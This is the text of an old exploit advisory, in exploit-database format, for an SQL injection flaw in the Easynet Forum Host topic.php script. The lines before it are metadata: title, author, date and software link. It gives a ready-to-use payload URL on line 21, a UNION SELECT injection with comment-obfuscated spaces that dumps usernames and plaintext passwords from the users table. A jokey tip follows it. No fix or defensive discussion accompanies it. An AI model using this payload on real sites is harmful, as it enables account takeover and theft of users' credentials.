Easynet Forum Host topic.php SQL Injection Vulnerbility.pdf

1 # Exploit Title: Easynet Forum Host (topic.php) SQL Injection Vulnerbility 2 # Date: 05/04/2008 3 # Author: Pr0T3cT10n 4 # Software Link: http://www.easynet4u.com/forum 5 # Version: all 6 # Tested on: all 7 # CVE: 8 # Code: 9 //−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 10 // Easynet Forum Host SQL Injection Vulnerbility 11 //−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 12 // Discovered by: Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com> 13 // Discovered on: 5 April 2008 14 // SCRIPT DOWNLOAD: N/A 15 //−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 16 // SCRIPT SITE: http://www.easynet4u.com/forum 17 //−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 18 // Description: retrive users username and plaintext password. 19 //−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 20 // NOTE / TIP: After you exploit the site please press CTRL+A :) 21 // EXPLOIT: http://www.server.com/SCRIPT_PATH/topic.php?topic=−1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0 x3a,password),5,6/**/FROM/**/users/*&forum=0 22 //−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Page 1/1 Easynet Forum Host topic.php SQL Injection Vulnerbility Pr0T3cT10n 03/12/2010